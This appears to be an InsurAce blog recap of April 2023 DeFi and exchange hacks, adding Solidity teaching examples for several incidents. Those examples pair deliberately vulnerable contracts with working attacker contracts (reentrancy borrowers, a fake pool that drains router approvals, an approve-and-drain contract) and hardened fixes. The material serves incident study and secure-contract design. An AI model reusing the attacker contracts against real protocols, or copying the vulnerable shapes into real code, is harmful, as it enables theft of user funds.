April Hacks

1. zkSync

April 2, 2023: In an official announcement on Twitter, the zkSync team explained the reason for the service interruption. The downtime was caused by a failure in the block queue database, which halted block generation. The server API was unaffected: transactions were still being accepted into the mempool and queries were answered normally. Despite robust monitoring, logging, and alerting, no alert was raised, because the checks were measuring the API, which was functioning correctly. The takeaway for operators is that API liveness is not chain liveness; an alert on time since the last produced block is the check that would have surfaced this halt.

Root cause: Downtime

Loss: approx. NA

Reference: Twitter Announcement

Claimable event: No 

2. Allbridge

April 2, 2023: Allbridge was hit with a flashloan-driven price manipulation attack that led to a loss of $549,874. The attacker flashloaned 7.5M BUSD, swapped 2M of it to USDT, and deposited 5M BUSD into the BUSD pool, skewing the pool's balance and therefore its pricing. The attacker then used Allbridge to swap 495,784 USDT for 490,849 BUSD at the distorted rate and withdrew from the BUSD pool, receiving 4,830,999 BUSD.

Root cause: Price Manipulation Attack

Loss: $570K

Reference: Post Mortem Twitter

Claimable event: No

3. Degen Zoo

April 2, 2023: Degen Zoo, a DAO Maker NFT project, was suspected of having been hacked. The team paused the game to investigate but has not found anything. The suspicion arose when an address burnt 2 million DZOO (the project's native token), worth a total of $58,000; no burn of that kind had ever happened before.

Root cause: Unknown

Loss: Unknown

Reference: Online News

Claimable event: No

4. MEV Bots

April 3, 2023: MEV bots lost about $25 million to a sandwich attack turned against them. MEV bots submit their bundles through MEV-boost relays precisely so that their transactions cannot be seen and front-run in the public mempool. In this case the attacker, acting as a validator, sent a signed but invalid block to the MEV-boost relay, and the relay replied with the payload, that is, the transactions (the bots' bundles) that should have been included in the block. Because the block was invalid, the relay did not propagate it to the network, so the attacker, as the slot's proposer, could build a block of their own around the revealed transactions and sandwich the bots' trades.

Root cause: Relay Vulnerability (Sandwich Attack)

Loss: $25M

Reference: Online News

Claimable event: No

5. Sentiment

April 4, 2023: Sentiment was hit with a read-only reentrancy attack. The attacker took a flashloan, joined a Balancer pool with the funds to receive pool tokens, and then called the pool's exitPool function to withdraw. exitPool sends the underlying assets back to the caller, which triggered the fallback function in the attacker's contract; from inside that fallback the attacker borrowed from Sentiment against the remaining pool tokens. Sentiment priced that collateral by reading pool state from the Balancer Vault, but because exitPool had not yet finished updating that state, the Vault returned a stale view of the pool's tokens and the collateral was overvalued. This miscalculation enabled the attacker to drain approximately $1 million from the protocol.
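The ordering that makes this possible, as an added example written for this page (it is not Sentiment's or Balancer's code): a toy vault burns the exiting user's shares, pays them out, and only then writes the new pool balance, so a price read taken from inside the payout callback sees a reduced supply against an unchanged balance. The vault itself is protected by a reentrancy lock; only readers are fooled. The safe oracle uses the probe Balancer recommends for this situation, a staticcall to a guarded no-op: it reverts with empty data when the vault is idle (the lock write is illegal in a static context) and with the lock's error data when a caller is still inside the vault. The contract names, the ETH-denominated pool and the 1e18 rate scale are assumptions for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

interface IOracle {
    function collateralValue(uint256 bpt) external view returns (uint256);
}

/// Toy stand-in for a Balancer-style vault (assumed shape, not Balancer's code).
/// Shares are burned, the exit is paid, and only then is the pool balance
/// written, so rate() is inflated for the duration of the payout callback.
contract ToyVault {
    uint256 private constant NOT_ENTERED = 1;
    uint256 private constant ENTERED = 2;
    uint256 private status = NOT_ENTERED;

    uint256 public poolBalance;                 // wei of ETH backing the pool
    uint256 public bptSupply;                   // pool shares outstanding
    mapping(address => uint256) public shares;

    modifier nonReentrant() {
        require(status != ENTERED, "REENTRANCY");
        status = ENTERED;
        _;
        status = NOT_ENTERED;
    }

    function joinPool() external payable nonReentrant {
        uint256 minted = bptSupply == 0 ? msg.value : msg.value * bptSupply / poolBalance;
        shares[msg.sender] += minted;
        bptSupply += minted;
        poolBalance += msg.value;
    }

    function exitPool(uint256 amount) external nonReentrant {
        require(shares[msg.sender] >= amount, "insufficient shares");
        uint256 owed = amount * poolBalance / bptSupply;
        shares[msg.sender] -= amount;
        bptSupply -= amount;                                  // supply already reduced ...
        (bool ok, ) = msg.sender.call{value: owed}("");       // ... when the caller regains control
        require(ok, "transfer failed");
        poolBalance -= owed;                                  // balance reduced only afterwards
    }

    /// Underlying per share, 1e18 scale. Correct between transactions, stale mid-exit.
    function rate() external view returns (uint256) {
        return bptSupply == 0 ? 1e18 : poolBalance * 1e18 / bptSupply;
    }

    /// Guarded no-op used as a reentrancy probe (mirrors Balancer's manageUserBalance trick).
    function manageUserBalance() external nonReentrant {}
}

/// Prices LP tokens straight off the vault, so it is fooled from inside exitPool.
contract VulnerableOracle is IOracle {
    ToyVault public immutable vault;
    constructor(ToyVault v) { vault = v; }
    function collateralValue(uint256 bpt) external view returns (uint256) {
        return bpt * vault.rate() / 1e18;
    }
}

/// Same pricing, but refuses to answer while any caller is inside the vault.
contract SafeOracle is IOracle {
    ToyVault public immutable vault;
    constructor(ToyVault v) { vault = v; }

    function collateralValue(uint256 bpt) external view returns (uint256) {
        ensureNotInVaultContext();
        return bpt * vault.rate() / 1e18;
    }

    function ensureNotInVaultContext() internal view {
        // Idle vault: the SSTORE in nonReentrant faults in static context -> empty revert data.
        // Vault currently entered: require() fires first -> non-empty revert data.
        (, bytes memory revertData) = address(vault).staticcall{gas: 10_000}(
            abi.encodeWithSelector(ToyVault.manageUserBalance.selector)
        );
        require(revertData.length == 0, "vault reentrancy: state is stale");
    }
}

/// Joins as the only LP, exits half, and reads its collateral value from inside the payout.
contract ReadOnlyReentrancyDemo {
    ToyVault public immutable vault;
    IOracle public immutable oracle;
    uint256 public valueSeenMidExit;            // with VulnerableOracle: 2x the true value
    uint256 public valueAfterExit;              // correct

    constructor(ToyVault v, IOracle o) { vault = v; oracle = o; }

    function run() external payable {
        vault.joinPool{value: msg.value}();
        vault.exitPool(msg.value / 2);
        valueAfterExit = oracle.collateralValue(vault.shares(address(this)));
    }

    receive() external payable {
        valueSeenMidExit = oracle.collateralValue(vault.shares(address(this)));
    }
}
```

Deploy ToyVault, an oracle and the demo against it, then call run() with some ETH. With VulnerableOracle, valueSeenMidExit comes back at twice valueAfterExit (10 ETH joined, 5 exited: supply is 5 ETH worth of shares while the balance still reads 10). With SafeOracle, the read inside receive() reverts and takes the exit with it, which is the right outcome for a lending protocol that should never price collateral from inside another protocol's state transition.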

Root cause: Contract Vulnerability (Re-entrancy Attack)

Loss: $1M

Reference: Online News

Claimable event: Yes (Smart Contract Cover)

6. GDAC

April 9, 2023: GDAC, a South Korean cryptocurrency exchange, disclosed that it was the victim of a hack that resulted in a loss of almost $13 million. According to the firm, the attackers moved almost 23% of its total custodial assets, roughly $13 million worth of cryptocurrency, from its hot wallet to an unknown wallet. The haul included around 61 bitcoin (BTC), 350.5 ether (ETH), 10 million WEMIX tokens and 220,000 USDT. GDAC reported the incident to the authorities and is taking steps to retrieve the lost funds.

Root cause: Wallet Attack

Loss: approx $13M

Reference: Online News

Claimable event: No

7. SushiSwap

April 9, 2023: SushiSwap lost a total of about $3.3 million to a bug in its RouteProcessor2 contract. The contract performed no checks on the route parameters passed in by the user, so an attacker could construct a malicious route whose "pool" was a contract of their own; the router's approval-related logic then paid that contract out of the allowances users had granted to RouteProcessor2. Only users who had swapped through (and therefore approved) the contract in the preceding four days were affected. A large portion of the funds has since been recovered through a white hat security process.
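The shape of the bug, as an added example that is not SushiSwap's code: when the route is user-supplied data, the pool the router calls is attacker-chosen, so a callback check of "is the caller the pool I just called?" is satisfied by the attacker's own contract, and if the callback also takes the payer from data the attacker supplies, it will pull tokens from any account that has approved the router. The hardened version accepts only pools the factory actually deployed, remembers who started the route, and derives the owed token from the pool rather than trusting callback data. The contract names, the processRoute/uniswapV3SwapCallback shapes and the factory lookup are assumptions chosen to mirror the Uniswap V3 callback convention; whether the real contract took the payer from callback data or from the route is not stated above.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

interface IERC20 {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

interface IUniV3PoolLike {
    function token0() external view returns (address);
    function token1() external view returns (address);
    function fee() external view returns (uint24);
}

interface IUniV3FactoryLike {
    function getPool(address tokenA, address tokenB, uint24 fee) external view returns (address);
}

/// Vulnerable shape (assumed): the route names the pool, and the callback trusts
/// both the caller and the payer encoded in the callback data.
contract VulnerableRouter {
    address private lastCalledPool;

    function processRoute(address pool, bytes calldata swapCall) external {
        lastCalledPool = pool;                      // attacker-chosen, never validated
        (bool ok, ) = pool.call(swapCall);
        require(ok, "swap failed");
        lastCalledPool = address(0);
    }

    function uniswapV3SwapCallback(int256 amount0Delta, int256 amount1Delta, bytes calldata data) external {
        require(msg.sender == lastCalledPool, "unknown caller");   // satisfied by the fake pool
        (address tokenIn, address payer) = abi.decode(data, (address, address));
        uint256 owed = uint256(amount0Delta > 0 ? amount0Delta : amount1Delta);
        // Pulls from any `payer` that ever approved this router, to whoever is calling.
        require(IERC20(tokenIn).transferFrom(payer, msg.sender, owed), "transferFrom failed");
    }
}

/// Attacker's "pool": when the router calls it, it calls back and names a victim as payer.
/// Driven with router.processRoute(address(fake), abi.encodeCall(FakePool.swap, (amount))).
contract FakePool {
    address public immutable victim;
    address public immutable token;
    constructor(address victim_, address token_) { victim = victim_; token = token_; }

    function swap(uint256 amount) external {
        VulnerableRouter(msg.sender).uniswapV3SwapCallback(int256(amount), 0, abi.encode(token, victim));
    }
}

/// Hardened shape: only factory-deployed pools, payer fixed when the route starts,
/// owed token derived from the pool, nothing trusted from callback data.
contract HardenedRouter {
    IUniV3FactoryLike public immutable factory;
    address private lastCalledPool;
    address private payer;

    constructor(IUniV3FactoryLike factory_) { factory = factory_; }

    function processRoute(address pool, bytes calldata swapCall) external {
        require(isCanonicalPool(pool), "pool not from factory");
        lastCalledPool = pool;
        payer = msg.sender;                         // never taken from the route or the callback
        (bool ok, ) = pool.call(swapCall);
        require(ok, "swap failed");
        lastCalledPool = address(0);
        payer = address(0);
    }

    function uniswapV3SwapCallback(int256 amount0Delta, int256 amount1Delta, bytes calldata) external {
        require(msg.sender == lastCalledPool, "unknown caller");   // lastCalledPool is 0 outside a route
        require(amount0Delta > 0 || amount1Delta > 0, "nothing owed");
        IUniV3PoolLike pool = IUniV3PoolLike(msg.sender);
        address tokenIn = amount0Delta > 0 ? pool.token0() : pool.token1();
        uint256 owed = uint256(amount0Delta > 0 ? amount0Delta : amount1Delta);
        require(IERC20(tokenIn).transferFrom(payer, msg.sender, owed), "transferFrom failed");
    }

    /// A pool is trusted only if the factory maps its own (token0, token1, fee) back to it;
    /// a fake pool can return any tokens and fee, but cannot make the factory vouch for it.
    function isCanonicalPool(address pool) public view returns (bool) {
        if (pool.code.length == 0) return false;
        IUniV3PoolLike p = IUniV3PoolLike(pool);
        return factory.getPool(p.token0(), p.token1(), p.fee()) == pool;
    }
}
```

The user-facing lesson is the same one the incident produced: an approval to a router is an approval to whatever that router can be talked into doing, so allowances to routing contracts should be revoked when a bug is disclosed rather than left standing.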

Root cause: Contract Vulnerability

Loss: approx. $3.3M

Reference: Analysis by SlowMist

Claimable event: Yes (Smart Contract Cover) 

8. Terraport

April 10, 2023: Terraport Finance, a newly launched decentralized finance (DeFi) exchange built on the Terra Classic blockchain, was hacked for a total of $4.4 million. On-chain data showed that 9.7 million TERRA, 15 billion LUNC and 5.5 million USTC were withdrawn in two transactions. Some suspected the incident was an inside job and therefore a rug pull: the Terraport developer wallet changed the code of three smart contracts related to liquidity provision functions five hours before the protocol's liquidity was drained.

Root cause: Rug Pull

Loss: $4.4M

Reference: Online News

Claimable event: No 

9. Paribus

April 11, 2023: Paribus was exploited for around $100,000 through a reentrancy attack on a known issue inherited from the old version of CompoundV2 it was forked from. The attacker flashloaned 30,000 USDT, used it as collateral to borrow 13 ETH from the pETH pool, and then redeemed pETH. The vulnerability was in the redeem function: it sends the native ETH, handing control to the attacker's fallback() function, before debiting the redeemer's pETH balance. Inside the fallback the pETH balance was therefore still intact and still counted as collateral, which allowed the attacker to borrow from the pUSDT and pWBTC pools as well.
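The ordering bug inherited from CompoundV2's native-token market, as an added example (not Paribus's or Compound's code): the vulnerable redeem pays out first and debits the redeemer's balance afterwards, so a borrow made from inside the payout callback is checked against collateral that is about to disappear. The fixed market follows checks-effects-interactions and adds a reentrancy lock. The single-market design, the 1:1 exchange rate and the 80% collateral factor are simplifications assumed for the example; in the real attack the extra borrows came from other markets through the comptroller, which reads the same stale balance.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

/// Minimal native-token market in the shape of a CompoundV2 fork's cEther
/// (assumed simplification: one market, 1:1 exchange rate, borrows paid in ETH).
abstract contract PEtherBase {
    uint256 public constant COLLATERAL_FACTOR_PCT = 80;
    mapping(address => uint256) public accountTokens;   // pETH held; 1 wei pETH == 1 wei ETH here
    mapping(address => uint256) public borrows;
    uint256 public totalSupply;

    function mint() external payable {
        accountTokens[msg.sender] += msg.value;
        totalSupply += msg.value;
    }

    function borrow(uint256 amount) external virtual {
        _borrow(amount);
    }

    function _borrow(uint256 amount) internal {
        uint256 capacity = accountTokens[msg.sender] * COLLATERAL_FACTOR_PCT / 100;
        require(borrows[msg.sender] + amount <= capacity, "insufficient collateral");
        borrows[msg.sender] += amount;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }

    function _checkRedeemAllowed(uint256 tokens) internal view {
        require(accountTokens[msg.sender] >= tokens, "insufficient balance");
        uint256 capacityAfter = (accountTokens[msg.sender] - tokens) * COLLATERAL_FACTOR_PCT / 100;
        require(borrows[msg.sender] <= capacityAfter, "redeem would cause shortfall");
    }

    function redeem(uint256 tokens) external virtual;
}

/// Inherited ordering: interaction before effects.
contract VulnerablePEther is PEtherBase {
    function redeem(uint256 tokens) external override {
        _checkRedeemAllowed(tokens);
        (bool ok, ) = msg.sender.call{value: tokens}("");   // caller regains control here ...
        require(ok, "transfer failed");
        totalSupply -= tokens;                               // ... with accountTokens still intact
        accountTokens[msg.sender] -= tokens;
    }
}

/// Fix: effects first, then the transfer, plus a lock so borrow() cannot run mid-redeem at all.
contract FixedPEther is PEtherBase {
    uint256 private locked = 1;
    modifier nonReentrant() {
        require(locked == 1, "reentrant call");
        locked = 2;
        _;
        locked = 1;
    }

    function borrow(uint256 amount) external override nonReentrant {
        _borrow(amount);
    }

    function redeem(uint256 tokens) external override nonReentrant {
        _checkRedeemAllowed(tokens);
        totalSupply -= tokens;
        accountTokens[msg.sender] -= tokens;
        (bool ok, ) = msg.sender.call{value: tokens}("");
        require(ok, "transfer failed");
    }
}

/// Deposits, redeems everything, and borrows from inside the redeem payout.
/// Assumes other suppliers have already minted, so the market can fund the borrow.
contract RedeemReentrancyAttacker {
    PEtherBase public immutable market;
    bool private inRedeem;

    constructor(PEtherBase market_) { market = market_; }

    function attack() external payable {
        market.mint{value: msg.value}();
        inRedeem = true;
        market.redeem(msg.value);     // VulnerablePEther: ends with 1.8x the deposit; FixedPEther: reverts
        inRedeem = false;
    }

    receive() external payable {
        if (inRedeem) {
            inRedeem = false;         // the borrow payout below must not recurse
            market.borrow(msg.value * market.COLLATERAL_FACTOR_PCT() / 100);
        }
    }
}
```

Against VulnerablePEther, attack() with 10 ETH returns 10 ETH from the redeem and 8 ETH from the borrow, leaving the attacker with 8 ETH of debt and zero collateral on the books. Against FixedPEther the nested borrow() hits the lock, the payout call fails, and the whole redeem reverts; even without the lock, the effects-first ordering alone would have made the borrow fail its collateral check.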

Root cause: Contract Vulnerability (Re-entrancy Attack)

Loss: $100K

Reference: Twitter Post Mortem

Claimable event: Yes (Smart Contract Cover) 

10. MetaPoint

April 12, 2023: MetaPoint, an online virtual world, was exploited through a smart contract vulnerability that resulted in a loss of $920,000. The contract exposed a public approval function with no access control, which let anyone make the contract approve a spender for the full amount of a user's deposit. The attacker deployed attack contracts that called this function to approve themselves for the maximum value and then transferred the deposits out.
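An added example of the pattern, not MetaPoint's code: a deposit contract that pools user tokens and leaves a token-approval helper public, the attack contract that turns that helper into a drain, and a hardened variant that has no open approval entry point and moves tokens only through per-user accounting. The contract names and the single-token design are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

interface IERC20 {
    function balanceOf(address account) external view returns (uint256);
    function transfer(address to, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
    function approve(address spender, uint256 amount) external returns (bool);
}

/// Vulnerable shape (assumed): deposits are pooled in the contract, and a helper
/// that was only ever meant for internal use is left public with no access control.
contract VulnerableDepositPool {
    IERC20 public immutable token;
    mapping(address => uint256) public deposits;

    constructor(IERC20 token_) { token = token_; }

    function deposit(uint256 amount) external {
        require(token.transferFrom(msg.sender, address(this), amount), "transferFrom failed");
        deposits[msg.sender] += amount;
    }

    /// BUG: anyone can make the pool approve any spender for the pooled balance.
    function approve(address spender, uint256 amount) external {
        token.approve(spender, amount);
    }

    function withdraw(uint256 amount) external {
        deposits[msg.sender] -= amount;          // reverts on underflow in 0.8
        require(token.transfer(msg.sender, amount), "transfer failed");
    }
}

/// What the attack contract does with it: approve itself for the maximum, then pull everything.
contract ApproveDrainer {
    function drain(VulnerableDepositPool pool, address to) external {
        IERC20 token = pool.token();
        pool.approve(address(this), type(uint256).max);
        uint256 pooled = token.balanceOf(address(pool));
        require(token.transferFrom(address(pool), to, pooled), "transferFrom failed");
    }
}

/// Hardened shape: there is no approve entry point at all. Tokens leave only via
/// withdraw(), bounded by the caller's own deposits. If a third-party spender is
/// genuinely needed, it is fixed at deployment and only the owner may grant it.
contract HardenedDepositPool {
    IERC20 public immutable token;
    address public immutable owner;
    address public immutable allowedSpender;     // e.g. a staking contract; assumption
    mapping(address => uint256) public deposits;

    constructor(IERC20 token_, address allowedSpender_) {
        token = token_;
        owner = msg.sender;
        allowedSpender = allowedSpender_;
    }

    function deposit(uint256 amount) external {
        require(token.transferFrom(msg.sender, address(this), amount), "transferFrom failed");
        deposits[msg.sender] += amount;
    }

    function withdraw(uint256 amount) external {
        deposits[msg.sender] -= amount;
        require(token.transfer(msg.sender, amount), "transfer failed");
    }

    /// Owner-only, spender fixed at deploy, and the spender address is visible on-chain for review.
    function approveSpender(uint256 amount) external {
        require(msg.sender == owner, "not owner");
        token.approve(allowedSpender, amount);
    }
}
```

The audit check this corresponds to is mechanical: list every external or public function that calls approve, transfer or transferFrom on a token the contract holds on behalf of users, and for each one name the modifier or require that restricts who may call it. A function with no answer is the MetaPoint bug.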

Root cause: Contract Vulnerability

Loss: $920K

Reference: Analysis by Beosin

Claimable event: Yes (Smart Contract Cover)

11. Yearn Finance

April 13, 2023: Yearn Finance, a decentralised yield aggregator, was exploited for a total of $10 million. The vulnerability was in an outdated contract predating Vaults v1 and v2: the project's immutable yUSDT token contract was misconfigured, which caused the pool ratio to be miscalculated. The attacker exploited this to mint 1.2 quadrillion yUSDT after depositing only 10,000 USDT.

Root cause: Contract Vulnerability

Loss: $10M

Reference: Online News

Claimable event: Yes (Smart Contract Cover)

12. SyncDex

April 13, 2023: SyncDex was rug pulled for a total of $370,000 in losses. The team has since deleted its social media accounts and cannot be contacted.

Root cause: Rug Pull

Loss: $370K

Reference: Twitter Announcement

Claimable event: No

13. Bitrue

April 14, 2023: Bitrue, a Singapore-based crypto exchange, was drained of $23 million through a wallet attack. The attackers withdrew assets worth approximately $23 million in ETH, QNT, GALA, SHIB, HOT and MATIC. Bitrue suspended all withdrawals that day and reopened them on 18 April 2023.

Root cause: Wallet Attack

Loss: $23M

Reference: Online News

Claimable event: No

14. Hundred Finance

April 16, 2023: Hundred Finance was hacked for a total of $7.4 million through a price manipulation attack funded by a flashloan. Hundred Finance had two WBTC hToken contracts: one was empty, while the other was the one accessible through the Hundred Finance UI. The attacker donated a large amount of WBTC directly to the empty contract, manipulating the exchange rate between hWBTC and WBTC. With almost no hWBTC in circulation, the rate was inflated so far that a tiny amount of hWBTC was enough collateral to drain the lending pools.
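The arithmetic behind the empty-market attack, as an added worked example (not Hundred Finance's or Compound's code): a Compound-style market computes its exchange rate as (cash + borrows - reserves) / totalSupply, and cash is simply the underlying balance of the contract, so a direct transfer counts. When totalSupply is a couple of wei, a donation makes each wei of hToken worth hundreds of WBTC, and the round-down in "tokens burned for a given amount of underlying" lets the attacker redeem far more than their share. The second function shows the same donation against a market whose deployer seeded and burned a small supply, which is one standard mitigation (the figures, the 1e18 initial rate and the 80% collateral factor are assumptions; the page does not state Hundred's own fix).

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

/// Compound-style cToken arithmetic (assumed simplification, not Hundred's code).
/// Rates are 1e18-scaled; amounts are in the underlying's smallest unit
/// (satoshi for WBTC, which has 8 decimals).
library CTokenMath {
    uint256 internal constant EXP = 1e18;

    /// exchangeRate = (cash + borrows - reserves) / totalSupply. cash is the
    /// contract's token balance, so a donation raises it with no new supply.
    function exchangeRate(uint256 cash, uint256 borrows, uint256 reserves, uint256 totalSupply, uint256 initialRate)
        internal pure returns (uint256)
    {
        if (totalSupply == 0) return initialRate;
        return (cash + borrows - reserves) * EXP / totalSupply;
    }

    /// cTokens minted for, or burned to receive, `underlying`. Rounds down either way.
    function tokensForUnderlying(uint256 underlying, uint256 rate) internal pure returns (uint256) {
        return underlying * EXP / rate;
    }

    /// Value of `tokens` in underlying; this is what the collateral check sees.
    function underlyingValue(uint256 tokens, uint256 rate) internal pure returns (uint256) {
        return tokens * rate / EXP;
    }
}

contract DonationAttackDemo {
    uint256 internal constant WBTC = 1e8;           // 1 WBTC in satoshi
    uint256 internal constant INITIAL_RATE = 1e18;  // 1 wei of hToken per satoshi on an empty market (assumption)
    uint256 internal constant CF_PCT = 80;

    /// Empty market: attacker leaves dust supply, donates 500 WBTC, borrows against it,
    /// then redeems with the rounding in their favour.
    function emptyMarket() external pure returns (
        uint256 rateAfterDonation, uint256 borrowCapacity, uint256 tokensBurned, uint256 cashLeft, uint256 collateralLeft
    ) {
        uint256 supply = 2;                         // dust left after minting, then redeeming nearly all
        uint256 cash = 2;                           // backing that dust 1:1
        cash += 500 * WBTC;                         // donation: plain transfer to the hToken contract
        rateAfterDonation = CTokenMath.exchangeRate(cash, 0, 0, supply, INITIAL_RATE);      // ~250 WBTC per wei
        uint256 collateral = CTokenMath.underlyingValue(supply, rateAfterDonation);         // ~500 WBTC
        borrowCapacity = collateral * CF_PCT / 100;                                          // ~400 WBTC of loans
        // Redeem 400 WBTC: 400 / 250 = 1.6 wei of hWBTC, rounded down to 1.
        tokensBurned = CTokenMath.tokensForUnderlying(400 * WBTC, rateAfterDonation);
        cash -= 400 * WBTC;
        supply -= tokensBurned;
        cashLeft = cash;                                                                     // ~100 WBTC
        // The remaining wei is now worth ~100 WBTC against ~400 WBTC of debt: bad debt.
        collateralLeft = CTokenMath.underlyingValue(
            supply, CTokenMath.exchangeRate(cash, 0, 0, supply, INITIAL_RATE)
        );
    }

    /// Same donation against a market seeded at launch with 1 WBTC worth of hWBTC
    /// that was minted to a dead address: supply is never dust, so the donation
    /// mostly accrues to the unredeemable seed and the attacker's dust stays dust.
    function seededMarket() external pure returns (uint256 rateAfterDonation, uint256 attackerCollateral) {
        uint256 seed = CTokenMath.tokensForUnderlying(1 * WBTC, INITIAL_RATE);  // 1e8 wei of hWBTC
        uint256 supply = seed + 2;
        uint256 cash = 1 * WBTC + 2;
        cash += 500 * WBTC;
        rateAfterDonation = CTokenMath.exchangeRate(cash, 0, 0, supply, INITIAL_RATE);  // ~501 satoshi per wei
        attackerCollateral = CTokenMath.underlyingValue(2, rateAfterDonation);          // ~1,002 satoshi
    }
}
```

Calling emptyMarket() returns a rate of about 2.5e28, a borrow capacity of about 400 WBTC, one wei burned, about 100 WBTC of cash left and about 100 WBTC of collateral backing the 400 WBTC loan. seededMarket() returns a rate of about 501e18 and attacker collateral of about 1,002 satoshi, so the 500 WBTC donation buys the attacker essentially nothing. The operational rule that follows is the one Compound forks keep relearning: never list a market with zero or dust supply, and treat any market that can be reached through a contract address rather than the UI as live.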

Root cause: Price Manipulation

Loss: approx. $7M

Reference: Post Mortem

Claimable event: No

15. KyberSwap

April 17, 2023: DEX aggregator and liquidity platform KyberSwap informed users that it had discovered a potential vulnerability in the KyberSwap Elastic smart contracts. No funds were lost.

Root cause: Contract Vulnerability

Loss: NIL

Reference: Twitter Announcement

Claimable event: Yes (Smart Contract Cover)

16. Arbtomb

April 18, 2023: Arbitrum project Arbtomb was suspected of being rug pulled. The scammer bridged 54 ETH, transferring 52 ETH to Tornado Cash and 2.4 ETH to Binance.

Root cause: Rug Pull

Loss: $110K

Reference: Analysis By Slowmist

Claimable event: No

17. zkLink

April 19, 2023: zkLink's Discord server was compromised and a spam announcement was posted. The project team has since regained control of the server.

Root cause: Social Engineering Attack

Loss: NIL

Reference: Twitter Announcement

Claimable event: No

18. Tales of Elleria

April 19, 2023: The team behind the web3 game Tales of Elleria reported on Twitter that they were victims of a theft that took advantage of an Arbitrum bridge contract. The team asked people to refrain from buying the ELM token and temporarily halted deposits and withdrawals from the game. The hacker used the bridge contract to mint 5 billion ELM and drain the LP, spreading the stolen amount across four transactions and exploiting a vulnerability related to the contract's recover function. The attack caused a significant drop in the value of the ELLERIUM (ELM) token, with its price falling by 99%.

Root cause: Contract Vulnerability (recover function, per the team's announcement)

Loss: $280K

Reference: Twitter Announcement

Claimable event: No

19. MEV Bot

April 20, 2023: An anonymous operator of a Maximal Extractable Value (MEV) bot made more than $1 million this week by carrying out "sandwich attacks" on buyers and sellers of two new meme coins. The wallet, associated with the Ethereum Name Service (ENS) domain "jaredfromsubway.eth", earned $950,000 from sandwich attacks on April 18 and approximately $300,000 and $400,000 on April 17 and 19 respectively, according to a tweet on April 19 by Sealaunch, a non-fungible token data platform.

Root cause: Sandwich Attack

Loss: $1.4M

Reference: Online News

Claimable event: No

20. FilDA

April 23, 2023: FilDA, a decentralized finance (DeFi) project, disclosed in a public statement that it suffered an exploit that caused losses of around $700,000. The project stated that it has identified the vulnerability and contained the attack. As a precautionary measure, the ESC and Rei FilDA platforms have been suspended while the investigation is ongoing. FilDA is currently tracking the hacker's actions.

Root cause: Contract Vulnerability

Loss: $700K

Reference: Project Announcement

Claimable event: Yes (Smart Contract Cover)

21. UniSat MarketPlace

April 24, 2023: The UniSat Marketplace, which had recently gone live, suffered multiple double-spend attacks due to a vulnerability in its code base. Although the team had tested the code by simulating various attack scenarios, some issues persisted in the public release. Preliminary findings indicate that 70 of the 383 transactions conducted were affected. The team is investigating and will provide further updates in the coming days; it has committed to compensating users who suffered losses from this incident.

Root cause: Double-Spend (code vulnerability)

Loss: Unknown

Reference: Twitter Announcement

Claimable event: No

22. Kucoin

April 24, 2023: Kucoin, a cryptocurrency exchange, reported that its official Twitter account was compromised for around 45 minutes on April 24, from 00:00 (UTC+2). During this time the attacker posted fake promotions on the account, leading multiple users to lose assets. As of 02:00 (UTC+2) on April 24 the exchange had identified 22 transactions related to the fake activity, including ETH/BTC, with a total value of 22,628 USDT. Kucoin has committed to fully compensating users with verified asset losses resulting from the social media compromise and the fake activity.

Root cause: Social Engineering Attack

Loss: $22.6K

Reference: Online News

Claimable event: No

23. Ordinals Finance

April 25, 2023: Ordinals Finance, an Ethereum-based decentralised finance protocol, was rug pulled for a total of $1 million. The protocol's developer withdrew 256 million OFI tokens from its smart contracts using a "safuToken" function.

Root cause: Rug Pull

Loss: $1M

Reference: Announcement by CertiK

Claimable event: No

24. Merlin

April 26, 2023: Merlin, a relatively new decentralized exchange on the zkSync L2, was drained during the Liquidity Generation Event for its MAGE token launch. The incident is suspected to have been a rug pull: the attacker netted $1.8 million by draining liquidity from the pools while users were still depositing assets. The root cause was excessive permissions granted to the feeTo address used during deployment, which had full permission to drain the pools of assets. This centralization issue was flagged during Merlin's second audit, with recommendations to adopt best practices such as multi-signature wallets and on-chain governance. Although the issue was marked as resolved in the audit, the centralization remained, leading to this potential rug pull.

Root cause: Rug Pull

Loss: $1.8M

Reference: Analysis by Halborn

Claimable event: No

25. 0vix Protocol

April 28, 2023: OVIX, a lending protocol built on the Polygon network, suffered a security breach that led to a loss of at least $2 million. Following the attack, the platform temporarily suspended its Polygon PoS and zkEVM deployments to contain the damage and address the issue. The breach was first reported by the blockchain security firm CertiK and later confirmed by Arkham Intelligence. OVIX lets users borrow against a range of assets, including stablecoins, Polygon's MATIC token and Ethereum derivatives. The attacker inflated the price of vGHST tokens, used them as collateral in the vGHST lending pool to borrow a significant amount of USDC, and exchanged the proceeds for 757 ETH on the Ethereum network.

Root cause: Price Manipulation Attack

Loss: $2M

Reference: Analysis by Neptune Mutual

Claimable event: No


About us:

InsurAce is a leading decentralised insurance protocol, providing reliable, robust and secure insurance services to DeFi users, allowing them to secure their investment funds against various risks.

InsurAce has been live since April 2021 and has built a full-spectrum cross-chain insurance product line, covering Smart Contract Vulnerabilities, Stablecoin De-Peg events, IDO risks, and Custodian Risks… protecting over $350m of assets of 5000+ customers!

Join the InsurAce community:

Discord: https://discord.com/invite/vCZMjuH69F

Telegram: https://t.me/insurace_protocol

Twitter: https://twitter.com/InsurAce_io

Email: contact@insurace.io

Read More about InsurAce: https://www.insurace.io/blog
